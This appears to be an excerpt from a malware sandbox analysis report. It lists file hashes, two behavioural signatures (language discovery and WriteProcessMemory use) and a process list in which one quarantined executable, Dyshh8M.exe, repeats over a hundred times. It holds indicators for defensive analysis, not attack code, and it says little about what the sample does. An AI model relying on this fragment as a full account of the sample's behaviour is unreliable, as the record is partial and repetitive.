| SHA512 | c4b2ec0d985c78761ecf4be024f29ba9cab78e94c3040866936c86b74a3942f4167de2fc78107b0d0dc63e8cc8d872ab02f5019883ec03e5db0559a39de4a30b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 7d5fd7d1a3fd09424692ac101c7b5324 |
| SHA1 | ec248ae02c2ad8d68bd9767b41eadc51b8480efc |
| SHA256 | 7296e0b85efe3d6cdbef4d8617fc646773f602cbf693cfe19f983a11c2990e69 |
| SHA512 | a57ce92174545adaea2980feb10e6e640b2be98050d58e207e2ab06b6587d9da2014552302d646bbb059d622dacefed43de7af99090e249319e1d0415f6e4086 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a2095d9a29fc83cf0e876cae66a39dc5 |
| SHA1 | 34208dba4502476b715d26404feec22676dedc4b |
| SHA256 | 86e1f9e742f40a4998089136b082595a716d26442ded6b9025f9a5acd731d515 |
| SHA512 | 5c9b4dd60eabe0e98982514b2341dfb43a4207e4322cdb05bc8cddf582fbceb1e4235991c37fe3776a8fa6a3eaed817ea7a8451c2c71d98f81f5ebf65c1c7844 |
Analysis: behavioral5
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win7-20240903-en
Max time kernel
150s
Max time network
119s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
(the same executable with the identical command line is listed 96 more times in the original process list)
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
